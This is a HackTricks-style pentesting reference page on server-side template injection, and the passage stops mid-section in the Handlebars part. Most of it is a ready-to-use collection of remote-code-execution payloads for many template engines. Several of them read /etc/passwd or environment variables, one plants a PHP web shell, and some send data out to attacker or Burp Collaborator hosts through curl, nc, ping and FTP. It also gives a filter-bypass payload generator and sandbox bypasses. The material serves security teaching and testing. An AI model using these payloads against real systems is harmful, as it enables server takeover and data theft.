# SSTI (Server Side Template Injection)

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

<figure><img src="../../.gitbook/assets/image (1) (3) (3).png" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a bustling meeting point for technology and cybersecurity professionals in every discipline.

{% embed url="https://www.rootedcon.com/" %}

## What is SSTI (Server-Side Template Injection)

Server-side template injection is a vulnerability that occurs when an attacker can inject malicious code into a template that is executed on the server. This vulnerability can be found in various technologies, including Jinja.

Jinja is a popular template engine used in web applications. Let's consider an example that demonstrates a vulnerable code snippet using Jinja:

```python
output = template.render(name=request.args.get('name'))
```

In this vulnerable code, the `name` parameter from the user's request is passed directly to the template using the `render` function. This can potentially allow an attacker to inject malicious code into the `name` parameter, leading to server-side template injection.

For example, an attacker could craft a request with a payload like this:

```
http://vulnerable-website.com/?name={{bad-stuff-here}}
```

The payload `{{bad-stuff-here}}` is injected into the `name` parameter. This payload may contain Jinja template directives that allow the attacker to execute unauthorized code or manipulate the template engine, potentially gaining control over the server.

To prevent server-side template injection vulnerabilities, developers should ensure that user input is properly sanitized and validated before it is inserted into templates. Implementing input validation and using context-aware escaping techniques can help mitigate the risk of this vulnerability.

### Detection

To detect Server-Side Template Injection (SSTI), initially, **fuzzing the template** is a straightforward approach. This involves injecting a sequence of special characters (**`${{<%[%'"}}%\`**) into the template and analyzing the differences in the server's response to regular data versus this special payload. Vulnerability indicators include:

* Thrown errors, revealing the vulnerability and potentially the template engine.
* Absence of the payload in the reflection, or parts of it missing, implying the server processes it differently from regular data.
* **Plaintext Context**: Distinguish from XSS by checking whether the server evaluates template expressions (e.g., `{{7*7}}`, `${7*7}`).
* **Code Context**: Confirm the vulnerability by altering input parameters. For instance, changing `greeting` in `http://vulnerable-website.com/?greeting=data.username` to see whether the server's output is dynamic or fixed, as in `greeting=data.username}}hello` returning the username.

#### Identification Phase

Identifying the template engine involves analyzing error messages or manually testing various language-specific payloads. Common payloads that cause errors include `${7/0}`, `{{7/0}}` and `<%= 7/0 %>`. Observing the server's response to mathematical operations helps pinpoint the specific template engine.
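
The probing described in the detection and identification phases above, as an added example that is not part of the original page: `identify` sends a benign value first, then one arithmetic probe per syntax family plus the fuzzing string, and labels each response as evaluated, reflected, stripped or error by comparing it with that baseline. `Response`, `send`, `classify`, `identify` and `fake_app` (a constructed stand-in for a vulnerable endpoint, so the code runs offline) are assumptions of this example, not part of any tool on this page.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Response:
    status: int
    body: str


# Arithmetic probes from the identification phase, one per syntax family.
# The engines listed are the ones this page covers for each syntax.
PROBES: Dict[str, str] = {
    "{{...}}": "{{7*7}}",        # Jinja, Twig, Pebble, Jinjava/HuBL
    "${...}": "${7*7}",          # FreeMarker, Velocity, SpringEL, EL
    "#{...}": "#{7*7}",          # legacy FreeMarker, EL
    "<%= ... %>": "<%= 7*7 %>",  # ERB/JSP-style engines
    "[[...]]": "[[${7*7}]]",     # Thymeleaf inline expressions
}
# The fuzzing string from the detection phase.
POLYGLOT = "${{<%[%'\"}}%\\"
# Words that commonly appear in template engine error pages.
ERROR_MARKERS = re.compile(r"Exception|Traceback|TemplateSyntax|ParseError", re.I)


def classify(baseline: Response, probe: str, resp: Response) -> str:
    """Label one probe response by comparing it with the benign baseline."""
    if resp.status >= 500 or ERROR_MARKERS.search(resp.body):
        return "error"        # engine choked on the input: strong engine hint
    if "49" in resp.body and "49" not in baseline.body and probe not in resp.body:
        return "evaluated"    # server computed 7*7: expression is interpreted
    if probe in resp.body:
        return "reflected"    # echoed verbatim: plain-text context, not SSTI
    return "stripped"         # payload absent or partial: processed differently


def identify(send: Callable[[str], Response]) -> Dict[str, object]:
    """Run the probe set through SEND (a function mapping input to Response)."""
    benign = "probe-value"
    baseline = send(benign)
    if benign not in baseline.body:
        return {"reflected_at_all": False}   # nothing to compare against
    per_family = {name: classify(baseline, p, send(p)) for name, p in PROBES.items()}
    evaluated: List[str] = [n for n, r in per_family.items() if r == "evaluated"]
    return {
        "reflected_at_all": True,
        "polyglot_error": classify(baseline, POLYGLOT, send(POLYGLOT)) == "error",
        "per_family": per_family,
        "evaluated_families": evaluated,
    }


# Constructed stand-in for a vulnerable endpoint: it evaluates integer
# products inside {{ }}, answers any other {{ or {% with an error page,
# and echoes everything else back as plain text.
_MUL = re.compile(r"\{\{\s*(\d+)\s*\*\s*(\d+)\s*\}\}")


def fake_app(name: str) -> Response:
    match = _MUL.fullmatch(name)
    if match:
        return Response(200, f"Hello {int(match.group(1)) * int(match.group(2))}")
    if "{{" in name or "{%" in name:
        return Response(500, "TemplateSyntaxError: unexpected token")
    return Response(200, f"Hello {name}")


if __name__ == "__main__":
    print(identify(fake_app))
```

Against a real target, `send` would wrap an HTTP client and put the probe into the parameter under test; the classification logic stays the same.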

## Tools

### [TInjA](https://github.com/Hackmanit/TInjA)

an efficient SSTI + CSTI scanner that utilizes novel polyglots

```bash
tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."
```

### [SSTImap](https://github.com/vladko312/sstimap)

```bash
python3 sstimap.py -i -l 5
python3 sstimap.py -u "http://example.com/" --crawl 5 --forms
python3 sstimap.py -u "https://example.com/page?name=John" -s
```

### [Tplmap](https://github.com/epinna/tplmap)

```bash
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
```

### [Template Injection Table](https://github.com/Hackmanit/template-injection-table)

an interactive table containing the most efficient template injection polyglots along with the expected responses of the 44 most important template engines.

## Exploits

### Generic

In this **wordlist** you can find **variables defined** in the environments of some of the engines mentioned below:

* [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt)
* [https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt](https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt)

### Java

**Java - Basic injection**

```java
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
// if ${...} doesn't work try #{...}, *{...}, @{...} or ~{...}.
```

**Java - Retrieve the system's environment variables**

```java
${T(java.lang.System).getenv()}
```

**Java - Retrieve /etc/passwd**

```java
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```

### FreeMarker (Java)

You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)

* `{{7*7}} = {{7*7}}`
* `${7*7} = 49`
* `#{7*7} = 49 -- (legacy)`
* `${7*'7'} Nothing`
* `${foobar}`

```java
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
```

**Freemarker - Sandbox bypass**

⚠️ only works on Freemarker versions below 2.3.30

```java
<#assign classloader=article.class.protectionDomain.classLoader>
<#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
<#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
<#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
${dwf.newInstance(ec,null)("id")}
```

**More information**

* In the FreeMarker section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker)

### Velocity (Java)

```java
// I think this doesn't work
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end

// This should work?
#set($s="")
#set($stringClass=$s.getClass())
#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())
#set($process=$runtime.exec("cat%20/flag563378e453.txt"))
#set($out=$process.getInputStream())
#set($null=$process.waitFor())
#foreach($i+in+[1..$out.available()])
$out.read()
#end
```

**More information**

* In the Velocity section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity)

### Thymeleaf

In Thymeleaf, a common test for SSTI vulnerabilities is the expression `${7*7}`, which also applies to this template engine. For potential remote code execution, expressions such as the following can be used:

* SpringEL:

```java
${T(java.lang.Runtime).getRuntime().exec('calc')}
```

* OGNL:

```java
${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}
```

Thymeleaf requires these expressions to be placed within specific attributes. However, _expression inlining_ is supported for other template locations, using syntax like `[[...]]` or `[(...)]`. Thus, a simple SSTI test payload might look like `[[${7*7}]]`.

However, the likelihood of this payload working is generally low. Thymeleaf's default configuration does not support dynamic template generation; templates must be predefined. Developers would need to implement their own `TemplateResolver` to create templates from strings on the fly, which is uncommon.

Thymeleaf also offers _expression preprocessing_, where expressions within double underscores (`__...__`) are preprocessed. This feature can be utilized in constructing expressions, as demonstrated in Thymeleaf's documentation:

```java
#{selection.__${sel.code}__}
```

**Example of Vulnerability in Thymeleaf**

Consider the following code snippet, which could be susceptible to exploitation:

```xml
<a th:href="@{__${path}__}" th:title="${title}">
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
```

This indicates that if the template engine processes these inputs improperly, it may lead to remote code execution by accessing URLs like:

```
http://localhost:8082/(7*7)
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
```

**More information**

* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)

{% content-ref url="el-expression-language.md" %}
[el-expression-language.md](el-expression-language.md)
{% endcontent-ref %}

### Spring Framework (Java)

```java
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
```

**Bypass filters**

Multiple variable expressions can be used; if `${...}` doesn't work, try `#{...}`, `*{...}`, `@{...}` or `~{...}`.

* Read `/etc/passwd`

```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```

* Custom script for payload generation

```python
#!/usr/bin/python3
## Written By Zeyad Abulaban (zAbuQasem)
# Usage: python3 gen.py "id"
from sys import argv

# Split the command into characters and encode each as its code point, so the
# resulting expression contains no quoted string for a filter to match.
cmd = list(argv[1].strip())
print("Payload: ", cmd, end="\n\n")
converted = [ord(c) for c in cmd]
base_payload = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec'
end_payload = '.getInputStream())}'

# Rebuild the command string as a chain of Character.toString(n).concat(...) calls
count = 1
for i in converted:
    if count == 1:
        base_payload += f"(T(java.lang.Character).toString({i}).concat"
        count += 1
    elif count == len(converted):
        base_payload += f"(T(java.lang.Character).toString({i})))"
    else:
        base_payload += f"(T(java.lang.Character).toString({i})).concat"
        count += 1

print(base_payload + end_payload)
```

**More information**

* [Thymleaf SSTI](https://javamana.com/2021/11/20211121071046977B.html)
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#java---retrieve-etcpasswd)

### Spring View Manipulation (Java)

```java
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
```

* [https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)

{% content-ref url="el-expression-language.md" %}
[el-expression-language.md](el-expression-language.md)
{% endcontent-ref %}

### Pebble (Java)

* `{{ someString.toUPPERCASE() }}`

Old version of Pebble (< version 3.0.9):

```java
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
```

New version of Pebble:

```java
{% raw %}
{% set cmd = 'id' %}
{% endraw %}

{% set bytes = (1).TYPE
     .forName('java.lang.Runtime')
     .methods[6]
     .invoke(null,null)
     .exec(cmd)
     .inputStream
     .readAllBytes() %}

{{ (1).TYPE
     .forName('java.lang.String')
     .constructors[0]
     .newInstance(([bytes]).toArray()) }}
```

### Jinjava (Java)

Jinjava is a Java library for parsing and rendering text templates. It is commonly used in Java web applications to process dynamic templates and is susceptible to server-side template injection (SSTI): Jinjava can be vulnerable to code injection attacks if it is not configured correctly, so be sure to validate and sanitize all user input when using it.

```java
{{'a'.toUpperCase()}} would result in 'A'
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
```

Jinjava is an open source project developed by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)

**Jinjava - Command execution**

Fixed by [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230)

```java
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
```

**More information**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava)

### Hubspot - HuBL (Java)

* `{% %}` statement delimiters
* `{{ }}` expression delimiters
* `{# #}` comment delimiters
* `{{ request }}` - com.hubspot.content.hubl.context.TemplateContextRequest@23548206
* `{{'a'.toUpperCase()}}` - "A"
* `{{'a'.concat('b')}}` - "ab"
* `{{'a'.getClass()}}` - java.lang.String
* `{{request.getClass()}}` - class com.hubspot.content.hubl.context.TemplateContextRequest
* `{{request.getClass().getDeclaredMethods()[0]}}` - public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()

Search for "com.hubspot.content.hubl.context.TemplateContextRequest" and discover the [Jinjava project on Github](https://github.com/HubSpot/jinjava/).

```java
{{request.isDebug()}}
//output: False
//Using string 'a' to get an instance of class sun.misc.Launcher
{{'a'.getClass().forName('sun.misc.Launcher').newInstance()}}
//output: sun.misc.Launcher@715537d4
//It is also possible to get a new object of the Jinjava class
{{'a'.getClass().forName('com.hubspot.jinjava.JinjavaConfig').newInstance()}}
//output: com.hubspot.jinjava.JinjavaConfig@78a56797
//It was also possible to call methods on the created object by combining the
{% raw %}
{% %} and {{ }} blocks
{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
{% endraw %}
{{ji.render('{{1*2}}')}}
//Here, I created a variable 'ji' with new instance of com.hubspot.jinjava.Jinjava class and obtained reference to the newInterpreter method. In the next block, I called the render method on 'ji' with expression {{1*2}}.
//{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
//output: xxx
//RCE
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
//output: java.lang.UNIXProcess@1e5f456e
//RCE with org.apache.commons.io.IOUtils.
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
//output: netstat execution
//Multiple arguments to the commands
Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
//Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```

**More information**

* [https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)

### Expression Language - EL (Java)

* `${"aaaa"}` - "aaaa"
* `${99999+1}` - 100000.
* `#{7*7}` - 49
* `${{7*7}}` - 49
* `${{request}}, ${{session}}, {{faceContext}}`

Expression Language (EL) is a fundamental feature that facilitates interaction between the presentation layer (such as web pages) and the application logic (such as managed beans) in JavaEE. It is used extensively across multiple JavaEE technologies to streamline this communication. The main JavaEE technologies that utilize EL include:

* **JavaServer Faces (JSF)**: Employs EL to bind components in JSF pages to the corresponding backend data and actions.
* **JavaServer Pages (JSP)**: EL is used in JSP to access and manipulate data within JSP pages, making it easier to connect page elements to application data.
* **Contexts and Dependency Injection for Java EE (CDI)**: EL integrates with CDI to allow seamless interaction between the web layer and managed beans, ensuring a more coherent application structure.

Check the following page to learn more about the **exploitation of EL interpreters**:

{% content-ref url="el-expression-language.md" %}
[el-expression-language.md](el-expression-language.md)
{% endcontent-ref %}

### Groovy (Java)

The following Security Manager bypasses were taken from this [**writeup**](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/).

```java
//Basic Payload
import groovy.*;
@groovy.transform.ASTTest(value={
    cmd = "ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net "
    assert java.lang.Runtime.getRuntime().exec(cmd.split(" "))
})
def x
//Payload to get output
import groovy.*;
@groovy.transform.ASTTest(value={
    cmd = "whoami";
    out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
    cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net";
    java.lang.Runtime.getRuntime().exec(cmd2.split(" "))
})
def x
//Other payloads
new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==")))
this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))
```

### Smarty (PHP)

```php
{$smarty.version}
{php}echo `id`;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{system('ls')} // compatible v3
{system('cat index.php')} // compatible v3
```

**More information**

* In the Smarty section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty)

### Twig (PHP)

* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
* `{{7*'7'}} = 49`
* `{{1/0}} = Error`
* `{{foobar}} Nothing`

```twig
#Get Info
{{_self}} #(Ref. to current application)
{{_self.env}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
#File read
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
#Exec code
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['id',""]|sort('system')}}
#Hide warnings and errors for automatic exploitation
{{["error_reporting", "0"]|sort("ini_set")}}
```

**Twig - Template Format**

```php
// Vulnerable: user input is concatenated into the template source itself,
// so any Twig syntax inside custom_greeting is parsed and evaluated
$output = $twig->render(
    'Dear ' . $_GET['custom_greeting'],
    array("first_name" => $user->first_name)
);
// Safe: the template is fixed and user-controlled values are passed as data
$output = $twig->render(
    "Dear {first_name}",
    array("first_name" => $user->first_name)
);
```

**More information**

* In the Twig and Twig (Sandboxed) sections of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)

### Plates (PHP)

Plates is a templating engine native to PHP, inspired by Twig. However, unlike Twig, which introduces a new syntax, Plates uses native PHP code in the templates, making it intuitive for PHP developers.

Controller:

```php
// Create new Plates instance
$templates = new League\Plates\Engine('/path/to/templates');
// Render a template
echo $templates->render('profile', ['name' => 'Jonathan']);
```

Page template:

```php
<?php $this->layout('template', ['title' => 'User Profile']) ?>

<h1>User Profile</h1>
<p>Hello, <?=$this->e($name)?></p>
```

Layout template:

```html
<html>
  <head>
    <title><?=$this->e($title)?></title>
  </head>
  <body>
    <?=$this->section('content')?>
  </body>
</html>
```

**More information**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates)

### PHPlib and HTML\_Template\_PHPLIB (PHP)

[HTML\_Template\_PHPLIB](https://github.com/pear/HTML\_Template\_PHPLIB) is the same as PHPlib but ported to Pear.

`authors.tpl`

```html
<html>
  <head><title>{PAGE_TITLE}</title></head>
  <body>
    <table>
      <caption>Authors</caption>
      <thead>
        <tr><th>Name</th><th>Email</th></tr>
      </thead>
      <tfoot>
        <tr><td colspan="2">{NUM_AUTHORS}</td></tr>
      </tfoot>
      <tbody>
        <!-- BEGIN authorline -->
        <tr><td>{AUTHOR_NAME}</td><td>{AUTHOR_EMAIL}</td></tr>
        <!-- END authorline -->
      </tbody>
    </table>
  </body>
</html>
```

`authors.php`

```php
<?php
//we want to display this author list
$authors = array(
    'Christian Weiske' => 'cweiske@php.net',
    'Bjoern Schotte' => 'schotte@mayflower.de'
);
require_once 'HTML/Template/PHPLIB.php';
//create template object
$t = new HTML_Template_PHPLIB(dirname(__FILE__), 'keep');
//load file
$t->setFile('authors', 'authors.tpl');
//set block
$t->setBlock('authors', 'authorline', 'authorline_ref');
//set some variables
$t->setVar('NUM_AUTHORS', count($authors));
$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d'));
//display the authors
foreach ($authors as $name => $email) {
    $t->setVar('AUTHOR_NAME', $name);
    $t->setVar('AUTHOR_EMAIL', $email);
    $t->parse('authorline_ref', 'authorline', true);
}
//finish and echo
echo $t->finish($t->parse('OUT', 'authors'));
?>
```

**More information**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html\_template\_phplib](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html\_template\_phplib)

### Jade (NodeJS)

```javascript
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')
```

```javascript
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
```

**More information**

* In the Jade section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)

### patTemplate (PHP)

> [patTemplate](https://github.com/wernerwa/pat-template) is a non-compiling PHP templating engine that uses XML tags to divide a document into different parts.

```xml
<patTemplate:tmpl name="page">
  This is the main page.
  <patTemplate:tmpl name="foo">
    It contains another template.
  </patTemplate:tmpl>
  <patTemplate:tmpl name="hello">
    Hello {NAME}.<br/>
  </patTemplate:tmpl>
</patTemplate:tmpl>
```

**More information**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate)

### Handlebars (NodeJS)

Path Traversal (more information [here](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)).

```bash
curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{\"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
```

* \= Error
* ${7\*7} = ${7\*7}
* Nothing

```handlebars
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').exec('whoami');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}
URLencoded:
